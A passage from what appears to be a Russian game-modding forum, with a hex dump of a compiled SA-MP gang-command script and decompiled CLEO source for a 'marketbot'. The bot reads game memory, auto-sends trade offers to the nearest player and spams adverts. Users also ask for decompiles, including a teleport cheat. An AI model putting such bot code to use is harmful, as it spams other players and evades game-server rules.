 20 7B 46 46 46 46 46 46 7D EF E0 F2 F0 EE ED EE
 E2 20 2D 20 41 4B 34 37 0A 7B 46 33 44 32 33 30
 7D 2F 6D 34 20 7B 46 46 46 46 46 46 7D 2D 20 7B
 46 46 35 46 35 46 7D 5B CA EE EB 2D F7 5D 20 7B
 46 46 46 46 46 46 7D EF E0 F2 F0 EE ED EE E2 20
 2D 20 4D 34 0A 7B 46 33 44 32 33 30 7D 2F 67 67
 20 7B 46 46 46 46 46 46 7D 2D 20 7B 46 46 35 46
 35 46 7D 5B CA EE EB 2D F7 5D 20 7B 46 46 46 46
 46 46 7D EC E0 F2 E5 F0 E8 E0 EB EE E2 20 2D 20
 C2 E7 FF F2 FC 20 EC E0 F2 E5 F0 E8 E0 EB FB 20
 F1 EE 20 F1 EA EB E0 E4 E0 0A 7B 46 33 44 32 33
 30 7D 2F 67 64 20 7B 46 46 46 46 46 46 7D 2D 20
 7B 46 46 35 46 35 46 7D 5B CA EE EB 2D F7 5D 20
 7B 46 46 46 46 46 46 7D ED E0 F0 EA EE F2 E8 EA
 EE E2 20 2D 20 CA F3 EF E8 F2 FC 20 ED E0 F0 EA
 EE F2 E8 EA E8 20 E2 20 EF F0 E8 F2 EE ED E5 0A
 7B 46 33 44 32 33 30 7D 2F 75 73 20 7B 46 46 46
 46 46 46 7D 2D 20 7B 46 46 35 46 35 46 7D 5B CA
 EE EB 2D F7 5D 20 7B 46 46 46 46 46 46 7D ED E0
 F0 EA EE F2 E8 EA EE E2 20 2D 20 D3 EF EE F2 F0
 E5 E1 E8 F2 FC 20 ED E0 F0 EA EE F2 E8 EA E8 0A
 7B 46 33 44 32 33 30 7D 2F 69 76 20 7B 46 46 46
 46 46 46 7D 2D 20 7B 46 46 35 46 35 46 7D 5B 49
 44 5D 20 7B 46 46 46 46 46 46 7D E8 E3 F0 EE EA
 E0 20 2D 20 CF F0 E8 ED FF F2 FC 20 E8 E3 F0 EE
 EA E0 20 E2 20 E1 E0 ED E4 F3 0A 7B 46 33 44 32
 33 30 7D 2F 75 76 20 7B 46 46 46 46 46 46 7D 2D
 20 7B 46 46 35 46 35 46 7D 5B 49 44 5D 20 7B 46
 46 46 46 46 46 7D E8 E3 F0 EE EA E0 20 2D 20 D3
 E2 EE EB E8 F2 FC 20 E8 E3 F0 EE EA E0 0A 7B 46
 33 44 32 33 30 7D 2F 67 72 20 7B 46 46 46 46 46
 46 7D 2D 20 7B 46 46 35 46 35 46 7D 5B 49 44 5D
 20 7B 46 46 46 46 46 46 7D E8 E3 F0 EE EA E0 20
 7B 46 46 35 46 35 46 7D 5B D0 E0 ED E3 5D 20 7B
 46 46 46 46 46 46 7D 2D 20 CF EE E2 FB F1 E8 F2
 FC 2F CF EE ED E8 E7 E8 F2 FC 20 E8 E3 F0 EE EA
 E0 0A 7B 46 33 44 32 33 30 7D 2F 63 6C 20 7B 46
 46 46 46 46 46 7D 2D 20 C2 FB EA EB FE F7 E8 F2
 FC 20 EA EB E8 F1 F2 0A 7B 46 33 44 32 33 30 7D
 2F 6D 67 20 7B 46 46 46 46 46 46 7D 2D 20 C2 E7
 FF F2 FC 20 FF F9 E8 EA 20 F1 20 E1 EE E5 EF F0
 E8 EF E0 F1 E0 EC E8 20 4C 56 41 2F 4C 53 41 0A
 7B 46 33 44 32 33 30 7D 2F 6D 70 20 7B 46 46 46
 46 46 46 7D 2D 20 CF EE EB EE E6 E8 F2 FC 20 FF
 F9 E8 EA 20 F1 20 E1 EE E5 EF F0 E8 EF E0 F1 E0
 EC E8 20 E2 20 F4 F3 F0 E3 EE ED 0A 7B 46 33 44
 32 33 30 7D 2F 68 6C 20 7B 46 46 46 46 46 46 7D
 2D 20 C8 F1 EF EE EB FC E7 EE E2 E0 F2 FC 20 E0
 EF F2 E5 F7 EA F3 0A 7B 46 33 44 32 33 30 7D 2F
 75 6E 20 7B 46 46 46 46 46 46 7D 2D 20 D0 E0 E7
 E3 F0 F3 E7 E8 F2 FC 20 F4 F3 F0 E3 EE ED 20 ED
 E0 20 F1 EA EB E0 E4 20 E1 E0 ED E4 FB 0A 7B 46
 33 44 32 33 30 7D 2F 77 61 20 7B 46 46 46 46 46
 46 7D 2D 20 CF F0 EE E2 E5 F0 E8 F2 FC 20 EA EE
 EB 2D F7 20 E1 EE E5 EF F0 E8 EF E0 F1 EE E2 20
 ED E0 20 F1 EA EB E0 E4 E5 20 E1 E0 ED E4 FB 0A
 7B 46 33 44 32 33 30 7D 2F 6D 62 20 7B 46 46 46
 46 46 46 7D 2D 20 CF F0 EE E2 E5 F0 E8 F2 FC 20
 EA EE EB 2D F7 20 E8 E3 F0 EE EA EE E2 20 EE ED
 EB E0 E9 ED 20 E2 20 E1 E0 ED E4 E5 0A 7B 46 33
 44 32 33 30 7D 2F 73 70 20 7B 46 46 46 46 46 46
 7D 2D 20 D1 EC E5 ED E8 F2 FC 20 EC E5 F1 F2 EE
 20 F1 EF E0 E2 ED E0 20 28 C4 EE EC 2C 20 EA E2
 E0 F0 F2 E8 F0 E0 2C 20 F0 E5 F1 EF E0 29 00 F8
 0A 0E 5D 7B 46 46 46 46 46 46 7D CD E5 E2 E5 F0
 ED FB E9 20 F4 EE F0 EC E0 F2 20 EA EE EC E0 ED
 E4 FB 3A 20 7B 46 46 35 46 35 46 7D CF F0 E8 EC
 E5 F0 3A 20 7B 46 46 46 46 46 46 7D 2F 64 65 20
 7B 46 46 35 46 35 46 7D 5B EA EE EB 2D F7 5D 20
 7B 46 46 46 46 46 46 7D EF E0 F2 F0 EE ED EE E2
 04 FF 00 43 0B F8 0A 0E 5F 7B 46 46 46 46 46 46
 7D CD E5 E2 E5 F0 ED FB E9 20 F4 EE F0 EC E0 F2
 20 EA EE EC E0 ED E4 FB 3A 20 7B 46 46 35 46 35
 46 7D CF F0 E8 EC E5 F0 3A 20 7B 46 46 46 46 46
 46 7D 2F 75 73 20 7B 46 46 35 46 35 46 7D 5B EA
 EE EB 2D F7 5D 20 7B 46 46 46 46 46 46 7D ED E0
 F0 EA EE F2 E8 EA EE E2 04 FF 00 43 0B F8 0A 0E
 5F 7B 46 46 46 46 46 46 7D CD E5 E2 E5 F0 ED FB
 E9 20 F4 EE F0 EC E0 F2 20 EA EE EC E0 ED E4 FB
 3A 20 7B 46 46 35 46 35 46 7D CF F0 E8 EC E5 F0
 3A 20 7B 46 46 46 46 46 46 7D 2F 67 67 20 7B 46
 46 35 46 35 46 7D 5B EA EE EB 2D F7 5D 20 7B 46
 46 46 46 46 46 7D EC E0 F2 E5 F0 E8 E0 EB EE E2
 04 FF 00 43 0B F8 0A 0E 5F 7B 46 46 46 46 46 46
 7D CD E5 E2 E5 F0 ED FB E9 20 F4 EE F0 EC E0 F2
 20 EA EE EC E0 ED E4 FB 3A 20 7B 46 46 35 46 35
 46 7D CF F0 E8 EC E5 F0 3A 20 7B 46 46 46 46 46
 46 7D 2F 67 64 20 7B 46 46 35 46 35 46 7D 5B EA
 EE EB 2D F7 5D 20 7B 46 46 46 46 46 46 7D ED E0
 F0 EA EE F2 E8 EA EE E2 04 FF 00 43 0B F8 0A 0E
 58 7B 46 46 46 46 46 46 7D CD E5 E2 E5 F0 ED FB
 E9 20 F4 EE F0 EC E0 F2 20 EA EE EC E0 ED E4 FB
 3A 20 7B 46 46 35 46 35 46 7D CF F0 E8 EC E5 F0
 3A 20 7B 46 46 46 46 46 46 7D 2F 69 76 20 7B 46
 46 35 46 35 46 7D 5B 49 44 5D 20 7B 46 46 46 46
 46 46 7D E8 E3 F0 EE EA E0 04 FF 00 43 0B
end

:Label000D34
chatmsg "{FFFFFF}Неверный формат команды: {FF5F5F}Пример: {FFFFFF}/uv {FF5F5F}[ID] {FFFFFF}игрока" -1
SAMP.CmdRet

:Label000D95
chatmsg "{FFFFFF}Неверный формат команды: {FF5F5F}Пример: {FFFFFF}/gr {FF5F5F}[ID] {FFFFFF}игрока {FF5F5F}[Ранг]" -1
SAMP.CmdRet

:Label0005C6
Код:
{F3D230}/de {FFFFFF}- {FF5F5F}[Кол-ч] {FFFFFF}патронов - DesertEagle.{F3D230}/sd {FFFFFF}- {FF5F5F}[Кол-ч] {FFFFFF}патронов - Silenced Pistol.{F3D230}/ri {FFFFFF}- {FF5F5F}[Кол-ч] {FFFFFF}патронов - Rifle.{F3D230}/sh {FFFFFF}- {FF5F5F}[Кол-ч] {FFFFFF}патронов - Shotgun.{F3D230}/sm {FFFFFF}- {FF5F5F}[Кол-ч] {FFFFFF}патронов - SMG.{F3D230}/ak {FFFFFF}- {FF5F5F}[Кол-ч] {FFFFFF}патронов - AK47.{F3D230}/m4 {FFFFFF}- {FF5F5F}[Кол-ч] {FFFFFF}патронов - M4.{F3D230}/gg {FFFFFF}- {FF5F5F}[Кол-ч] {FFFFFF}материалов - Взять материалы со склада.{F3D230}/gd {FFFFFF}- {FF5F5F}[Кол-ч] {FFFFFF}наркотиков - Купить наркотики в притоне.{F3D230}/us {FFFFFF}- {FF5F5F}[Кол-ч] {FFFFFF}наркотиков - Употребить наркотики.{F3D230}/iv {FFFFFF}- {FF5F5F}[ID] {FFFFFF}игрока - Принять игрока в банду.{F3D230}/uv {FFFFFF}- {FF5F5F}[ID] {FFFFFF}игрока - Уволить игрока.{F3D230}/gr {FFFFFF}- {FF5F5F}[ID] {FFFFFF}игрока {FF5F5F}[Ранг] {FFFFFF}- Повысить/Понизить игрока.{F3D230}/cl {FFFFFF}- Выключить клист.{F3D230}/mg {FFFFFF}- Взять ящик с боеприпасами LVA/LSA.{F3D230}/mp {FFFFFF}- Положить ящик с боеприпасами в фургон.{F3D230}/hl {FFFFFF}- Использовать аптечку.{F3D230}/un {FFFFFF}- Разгрузить фургон на склад банды.{F3D230}/wa {FFFFFF}- Проверить кол-ч боеприпасов на складе банды.{F3D230}/mb {FFFFFF}- Проверить кол-ч игроков онлайн в банде.{F3D230}/sp {FFFFFF}- Сменить место спавна (Дом, квартира, респа).ш..]{FFFFFF}Неверный формат команды: {FF5F5F}Пример: {FFFFFF}/de {FF5F5F}[кол-ч] {FFFFFF}патронов.я.C.ш.._{FFFFFF}Неверный формат команды: {FF5F5F}Пример: {FFFFFF}/us {FF5F5F}[кол-ч] {FFFFFF}наркотиков.я.C.ш.._{FFFFFF}Неверный формат команды: {FF5F5F}Пример: {FFFFFF}/gg {FF5F5F}[кол-ч] {FFFFFF}материалов.я.C.ш.._{FFFFFF}Неверный формат команды: {FF5F5F}Пример: {FFFFFF}/gd {FF5F5F}[кол-ч] {FFFFFF}наркотиков.я.C.ш..X{FFFFFF}Неверный формат команды: {FF5F5F}Пример: {FFFFFF}/iv {FF5F5F}[ID] {FFFFFF}игрока.я.C.

Код:
{F3D230}/de {FFFFFF}- {FF5F5F}[Кол-ч] {FFFFFF}патронов - DesertEagle
{F3D230}/sd {FFFFFF}- {FF5F5F}[Кол-ч] {FFFFFF}патронов - Silenced Pistol
{F3D230}/ri {FFFFFF}- {FF5F5F}[Кол-ч] {FFFFFF}патронов - Rifle
{F3D230}/sh {FFFFFF}- {FF5F5F}[Кол-ч] {FFFFFF}патронов - Shotgun
{F3D230}/sm {FFFFFF}- {FF5F5F}[Кол-ч] {FFFFFF}патронов - SMG
{F3D230}/ak {FFFFFF}- {FF5F5F}[Кол-ч] {FFFFFF}патронов - AK47
{F3D230}/m4 {FFFFFF}- {FF5F5F}[Кол-ч] {FFFFFF}патронов - M4
{F3D230}/gg {FFFFFF}- {FF5F5F}[Кол-ч] {FFFFFF}материалов - Взять материалы со склада
{F3D230}/gd {FFFFFF}- {FF5F5F}[Кол-ч] {FFFFFF}наркотиков - Купить наркотики в притоне
{F3D230}/us {FFFFFF}- {FF5F5F}[Кол-ч] {FFFFFF}наркотиков - Употребить наркотики
{F3D230}/iv {FFFFFF}- {FF5F5F}[ID] {FFFFFF}игрока - Принять игрока в банду
{F3D230}/uv {FFFFFF}- {FF5F5F}[ID] {FFFFFF}игрока - Уволить игрока
{F3D230}/gr {FFFFFF}- {FF5F5F}[ID] {FFFFFF}игрока {FF5F5F}[Ранг] {FFFFFF}- Повысить/Понизить игрока
{F3D230}/cl {FFFFFF}- Выключить клист
{F3D230}/mg {FFFFFF}- Взять ящик с боеприпасами LVA/LSA
{F3D230}/mp {FFFFFF}- Положить ящик с боеприпасами в фургон
{F3D230}/hl {FFFFFF}- Использовать аптечку
{F3D230}/un {FFFFFF}- Разгрузить фургон на склад банды
{F3D230}/wa {FFFFFF}- Проверить кол-ч боеприпасов на складе банды
{F3D230}/mb {FFFFFF}- Проверить кол-ч игроков онлайн в банде
{F3D230}/sp {FFFFFF}- Сменить место спавна (Дом, квартира, респа)
]{FFFFFF}Неверный формат команды: {FF5F5F}Пример: {FFFFFF}/de {FF5F5F}[кол-ч] {FFFFFF}патронов
_{FFFFFF}Неверный формат команды: {FF5F5F}Пример: {FFFFFF}/us {FF5F5F}[кол-ч] {FFFFFF}наркотиков
_{FFFFFF}Неверный формат команды: {FF5F5F}Пример: {FFFFFF}/gg {FF5F5F}[кол-ч] {FFFFFF}материалов
_{FFFFFF}Неверный формат команды: {FF5F5F}Пример: {FFFFFF}/gd {FF5F5F}[кол-ч] {FFFFFF}наркотиков
{FFFFFF}Неверный формат команды: {FF5F5F}Пример: {FFFFFF}/iv {FF5F5F}[ID] {FFFFFF}игрока
 

FSFFGSF

Новичок
28
0
Декомпил пж репа и лайк с меня заранее спс
 

Вложения

  • marketbot.cs
    22 KB · Просмотры: 15

asdzxcjqwe

¯\_(ツ)_/¯
Друг
621
704
Декомпил пж репа и лайк с меня заранее спс
CLEO:
// This file was decompiled using SASCM.ini published by GTAG (http://gtag.gtagaming.com/opcode-database) on 14.6.2013
{$CLEO .cs}

//-------------MAIN---------------
0000: nop
thread "Noname"

:Label00000C
wait 400
if
   SAMP.Available()
else_jump @Label00000C
alloc 19@ 256
gosub @Label000331
0B34: samp register_client_command "marketbot" to_label @Label00015D
chatmsg "{44FF44}MarketBOT: {FFFFFF}For {00A2E8}Advance RP {FFFFFF}loaded" -1
chatmsg "Автор: {E9BE10}Ded_Fedot" -1
chatmsg "Активация/Дезактивация: {EF0008}/marketbot" -1

:Label0000D2
wait 0
if
  4@ == 1
else_jump @Label000156
if
call @Label0001FB 0 0@ 1@
else_jump @Label000156
2@ = SAMP.GetSAMPPlayerIDByActorHandle(0@)
if
   not SAMP.IsPlayerPaused(2@)
else_jump @Label000156
say "/market %d %d" 2@ 20@
wait 22@
say "/cancel"
wait 18@
say "/s %s" 19@

:Label000156
jump @Label0000D2

:Label00015D
if
  4@ == 0
else_jump @Label0001B2
print "~b~SCRIPT ~r~by ~y~DED_FEDOT ~w~'BOT ~g~ON~w~'" 1500
gosub @Label000331
jump @Label0001E8

:Label0001B2
print "~b~SCRIPT ~r~by ~y~DED_FEDOT ~w~'BOT ~r~OFF~w~'" 1500

:Label0001E8
gosub @Label000331
0B12: 4@ = 4@ XOR 1
SAMP.CmdRet

:Label0001FB
0@ = 6.0
1@ = -1
0A8D: 29@ = read_memory 12010640 size 4 virtual_protect 0
29@ += 4
0A8D: 29@ = read_memory 29@ size 4 virtual_protect 0
30@ = 0

:Label000234
0A8D: 31@ = read_memory 29@ size 1 virtual_protect 0
29@ += 1
if and
  31@ >= 0
  128 > 31@
else_jump @Label0002B7
005A: 31@ += 30@ // (int)
if and
056D:   actor 31@ defined
803C:   not  $0[3] == 31@ // (int)
else_jump @Label0002B7
call @Label0002F6 2 $0[3] 31@ 2@
if
8035:   not  2@ >= 0@ // (float)
else_jump @Label0002B7
0087: 0@ = 2@ // (float)
0085: 1@ = 31@ // (int)

:Label0002B7
30@ += 256
  30@ > 35584
else_jump @Label000234
if
   not 1@ == -1
else_jump @Label0002ED
ret 2 1@ 0@

:Label0002ED
ret 2 0 0

:Label0002F6
Actor.StorePos(0@, 2@, 3@, 4@)
Actor.StorePos(1@, 5@, 6@, 7@)
050A: 8@ = distance_between_XYZ 2@ 3@ 4@ and_XYZ 5@ 6@ 7@
ret 1 8@

:Label000331
if
0AAB:   file_exists "CLEO\marketbot.ini"
else_jump @Label00035D
wait 0
jump @Label00045D

:Label00035D
if
8AE4:   not directory_exists "CLEO"
else_jump @Label000378
0AE5: create_directory "CLEO" // IF and SET

:Label000378
0AF1: write_int 3000 to_ini_file "CLEO\marketbot.ini" section "Реклама" key "Задержка"
0AF5: write_string "ссылка вырезана" to_ini_file "CLEO\marketbot.ini" section "Реклама" key "Текст"
0AF1: write_int 50 to_ini_file "CLEO\marketbot.ini" section "Настройки" key "Цена"
0AF1: write_int 2000 to_ini_file "CLEO\marketbot.ini" section "Настройки" key "Антифлуд"
0AF1: write_int 5000 to_ini_file "CLEO\marketbot.ini" section "Настройки" key "Cancel"

:Label00045D
0AF0: 18@ = get_int_from_ini_file "CLEO\marketbot.ini" section "Реклама" key "Задержка"
0AF4: 19@ = read_string_from_ini_file "CLEO\marketbot.ini" section "Реклама" key "Текст"
0AF0: 20@ = get_int_from_ini_file "CLEO\marketbot.ini" section "Настройки" key "Цена"
0AF0: 21@ = get_int_from_ini_file "CLEO\marketbot.ini" section "Настройки" key "Антифлуд"
0AF0: 22@ = get_int_from_ini_file "CLEO\marketbot.ini" section "Настройки" key "Cancel"
return
 
  • Нравится
Реакции: FSFFGSF

LaRossa

Потрачен
429
117
Обратите внимание, пользователь заблокирован на форуме. Не рекомендуется проводить сделки.
Откройте пж с меня репа
 

Вложения

  • Приват ТП.cs
    20.3 KB · Просмотры: 29